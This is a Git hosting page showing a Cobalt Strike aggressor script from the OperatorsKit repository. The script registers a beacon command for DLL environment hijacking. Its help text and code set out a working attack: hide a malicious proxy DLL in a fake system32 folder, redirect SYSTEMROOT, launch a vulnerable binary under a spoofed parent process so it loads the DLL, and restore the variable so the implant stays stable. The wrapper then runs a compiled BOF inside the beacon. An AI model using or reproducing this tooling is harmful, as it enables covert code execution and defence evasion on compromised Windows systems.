Página inicial Explorar Ajuda
Entrar
zhensolid
/
OperatorsKit
1
0
Fork 0
Arquivos Issues 0 Pull Requests 0 Wiki
Branch: main
Branches Tags
OperatorsKit
/
KIT
/
DllEnvHijacking
/
dllenvhijacking.cna

dllenvhijacking.cna 2.0 KB
Link permanente Histórico Raw

12345678910111213141516171819202122232425262728293031323334 
  1. # author REDMED-X
    2. 

  2. 

  3. beacon_command_register(
    4. 

  4. 	"dllenvhijacking", "BOF implementation of DLL environment hijacking.",
    5. 

  5. 	"INFO:\nThis tool will setup a hidden file structure, move an already on disk present malicious proxy DLL to the new system32 folder, hide the proxy DLL, modify the SYSTEMROOT environment variable, run the vulnerable binary as a spoofed process to execute the malicious DLL, and reset the original SYSTEMROOT environment variable so the beacon keeps working as intended.\n\nOPTIONS:\n[<new sysroot dir>]: the new directory name as a path that will be used as the new SYSTEMROOT variable like C:\\Data\\ (make sure the directory path ends with \\).\n[<malicious DLL name>]: the name of the malicious DLL that will be loaded by the vulnerable binary (e.g. mswsock.dll).\n[<path to mal. DLL folder>]: the path on the target system to the folder were the malicious DLL is stored (don't add the DLL name and end the path with a \\).\n[<name of vulnerable binary>]: the name of the vulnerable binary that will be executed and loads the malicious DLL (e.g. hostname.exe).\n[<pid parent proc>]: the process ID of the parent process under which the vulnerable binary will run as a child.\n\n" .
    6. 

  6. 	"USAGE:\ndllenvhijacking <new sysroot dir> <malicious DLL name> <path to mal. DLL folder> <name of vulnerable binary> <pid parent proc>\n\n");
    7. 

  7. 

  8. 

  9. alias dllenvhijacking {
    10. 

  10.     $bid = $1;
    11. 

  11.     $sysroot = $2;
    12. 

  12.     $proxydll = $3;
    13. 

  13.     $pathtodll = $4;
    14. 

  14.     $vulnbinary = $5;
    15. 

  15.     $pid = $6;
    16. 

  16. 

  17.     if ($sysroot eq "" || $proxydll eq "" || $pathtodll eq "" || $vulnbinary eq "" || $pid eq "") {
    18. 

  18.         berror($bid, "Please make sure that all the arguments are filled in and correct!\n");
    19. 

  19.         return;
    20. 

  20.     }
    21. 

  21. 

  22.     # Read in the right BOF file
    23. 

  23.     $handle = openf(script_resource("dllenvhijacking.o"));
    24. 

  24.     $data   = readb($handle, -1);
    25. 

  25.     closef($handle);
    26. 

  26. 

  27.     # Pack our arguments
    28. 

  28.     $arg_data  = bof_pack($bid, "ZZZzi", $sysroot, $proxydll, $pathtodll, $vulnbinary, $pid);
    29. 

  29. 

  30.     blog($bid, "Tasked execute DLL Environment hijacking..");
    31. 

  31.     beacon_inline_execute($bid, $data, "go", $arg_data);
    32. 

  32. }
    33. 

  33. 

  34.